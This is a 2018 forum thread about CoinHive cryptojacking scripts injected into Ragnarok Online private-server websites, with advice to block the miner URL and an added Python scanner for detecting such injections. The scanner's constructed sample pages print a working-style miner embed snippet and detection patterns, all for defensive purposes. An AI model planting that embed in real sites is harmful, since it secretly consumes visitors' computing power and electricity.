CoinHive Strikes IfritRO

Started by Emcee, Jan 04, 2018, 06:09 AM


Emcee

Wow, another server attacked by CoinHive!!

www.prnt.sc/hvwxsg

CoinHive is something that eats up RAM! The other server responded to it fast and fixed it right away. How will this server deal with it?!

yC

Is that something that is served by the host, or because they got the control panel / website template files from the same source? This looks suspicious at the source rather than on individual servers.

DeePee

https://imgur.com/U4Jad9W

This is the one from CapeRO. Same address I think?

Seems like a malicious template seller and server owners who don't bother/aren't capable of checking the website source?

Emcee

I think CoinHive is starting to attack servers.

CapeRO took action fast. Their website is safe and, honestly, they are doing well.

IfritRO is still not responding.

Parachute

This form of attack is one of the latest security threats worldwide, called cryptojacking.

First of all, it gained popularity around the last week of September 2017, and one of its first pioneers is the company called CoinHive. Is it illegal? Technically not yet. It is different from making your PC a zombie or part of a botnet, since hackers (usually just script kiddies) are not forcing any malware (like viruses, trojans, worms, etc.) onto your system. Though it's unethical to harness one's PC's performance/processing power and battery life/electricity consumption just for the offender's cryptomining benefit. Does your laptop/PC get hot or make noises (meaning it needed a performance boost) whenever you visit an RO website? That is probably a good indication that somebody is using your system to mine cryptocurrency. Sadly, you will never notice this unless you have good browser protection enabled.

Quote from: Emcee on Jan 04, 2018, 01:41 PM
I think CoinHive is starting to attack servers.

It is not CoinHive themselves attacking server websites, but a user of CoinHive injecting his dedicated script into vulnerable pserver websites.

The more I see RO websites being "attacked" by this, the more sense it makes to me. There are only 2 possibilities.

1. JavaScript cryptocurrency mining had been added to the webpage before the site was even live.
2. The site was already live and SAFE, but later on this script was added; it's either the work of the admin or of a hacker. Most of the time, admins avoid RMS drama, so if they are smart enough to understand that, they wouldn't add this script.

I read a study months ago that around 80-90% of sites (worldwide) that run a crypto-mining script have outdated software (or whatever) in their system that is easily exploited by hackers. Then a hacker compromises a site and inserts their dedicated CoinHive code. They generate income as simply as someone visiting the infected site. Based on the JavaScript provided from the 2 compromised servers, CapeRO and IfritRO, it seems like it has the same CoinHive TAG. Meaning, this code is from the very same user... and he's doing a really good job exploiting RO sites via the control panel.

CapeRO: https://imgur.com/U4Jad9W
IfritRO: www.prnt.sc/hvwxsg

@To the server admins:
If more and more pservers have been attacked by cryptojacking, then that means the control panel (such as FluxCP) generally used by pservers is now too outdated. Meaning, the best thing you can do is invest in a good web protection firewall. If you have decent earnings via donations, you may want to upgrade your website and avail of decent protections (such as a Web Application Firewall (WAF), virtual patching and hardening) along with your DDoS protection. Find a company that scans your files to check for suspicious scripts.

Most cryptojacking only occurs on vulnerable sites; it's just that RO pservers generally do not avail of that kind of protection, as it is an "extra" monthly bill.

@To the users:
The good thing is that you can easily stop the miner from running without having to block any of the websites you visit that might have embedded this code; you just need to block a specific JavaScript URL in your ad blocker (if you are using one in your browser). The URL to block is this:
https://coinhive.com/lib/miner.min.js

Alternatively, you can download browser extensions to defend against this threat, such as Norton, No Coin, minerBlock, etc.
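The post above tells admins to check their site source for injected scripts and notes that both compromised pages carried the same CoinHive tag. The script below is an added example, not code from this thread or from any of the servers mentioned: it parses saved page source, flags `<script src>` tags that load the CoinHive library from the URL the post says to block (the second loader filename, `coinhive.min.js`, is assumed from CoinHive's own documented snippet), and pulls the site key out of the documented `new CoinHive.Anonymous('<key>')` call so two pages can be compared for the same operator. All sample HTML and the key in it are constructed.

```python
"""Scan saved HTML for injected CoinHive loaders and extract the site key.

Added example for this thread, not the forum's or any RO server's code.
The loader list and the sample pages below are constructed for illustration.
"""
import re
from dataclasses import dataclass, field
from html.parser import HTMLParser

# Assumed loader list: the URL the thread says to block plus the filename
# from CoinHive's documented embed snippet. Extend for other miner services.
MINER_SCRIPT_PATTERNS = (
    re.compile(r"coinhive\.com/lib/(miner|coinhive)\.min\.js", re.I),
)
# Documented CoinHive embed was `new CoinHive.Anonymous('SITE_KEY')`; the
# key is the per-account tag the post compares across CapeRO and IfritRO.
SITE_KEY_RE = re.compile(r"CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9]+)['\"]")


@dataclass
class ScanResult:
    loader_urls: list = field(default_factory=list)
    site_keys: list = field(default_factory=list)

    @property
    def infected(self):
        return bool(self.loader_urls or self.site_keys)


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.srcs, self.inline = [], []
        self._in_script, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.srcs.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def scan_html(html):
    """Return loader URLs and CoinHive site keys found in one page's source."""
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    result = ScanResult()
    for src in parser.srcs:
        if any(pat.search(src) for pat in MINER_SCRIPT_PATTERNS):
            result.loader_urls.append(src)
    for code in parser.inline:
        result.site_keys.extend(SITE_KEY_RE.findall(code))
    return result


def same_operator(a, b):
    """True if two scans share a site key, i.e. the same miner account."""
    return bool(set(a.site_keys) & set(b.site_keys))


# Constructed samples: a clean control-panel page and two infected pages
# that share one (made-up) site key, as the post describes for two servers.
CLEAN_PAGE = """<html><head><script src="/themes/default/js/jquery.js"></script>
</head><body><h1>Server Status</h1></body></html>"""
INFECTED_A = """<html><head>
<script src="https://coinhive.com/lib/miner.min.js"></script>
<script>var miner = new CoinHive.Anonymous('EXAMPLEKEYabc123'); miner.start();</script>
</head><body>...</body></html>"""
INFECTED_B = INFECTED_A.replace("miner.min.js", "coinhive.min.js")

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("site A", INFECTED_A), ("site B", INFECTED_B)):
        r = scan_html(page)
        print(name, "INFECTED" if r.infected else "clean", r.loader_urls, r.site_keys)
    print("same operator:", same_operator(scan_html(INFECTED_A), scan_html(INFECTED_B)))
```

Run it over every page and template file the control panel serves, not only the index: as a later reply in this thread notes, the injected script may not be on the main page. A matching key across two unrelated servers supports the post's point that one account is behind both injections.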

Emcee

Quote from: Parachute on Jan 04, 2018, 03:48 PM
This form of attack is one of the latest security threats worldwide, called cryptojacking.

It's the host, bra.

Emcee

Take some fking action, my PC is slowing down every time I enter this site.

yC

One day after you posted I looked at the website and couldn't find the code in your screenshot. Are you sure they haven't taken care of it yet, or is it not on the main page?


Emcee

Quote from: yC on Jan 08, 2018, 12:53 PM
One day after you posted I looked at the website and couldn't find the code in your screenshot. Are you sure they haven't taken care of it yet, or is it not on the main page?

I will report the link as soon as I get home.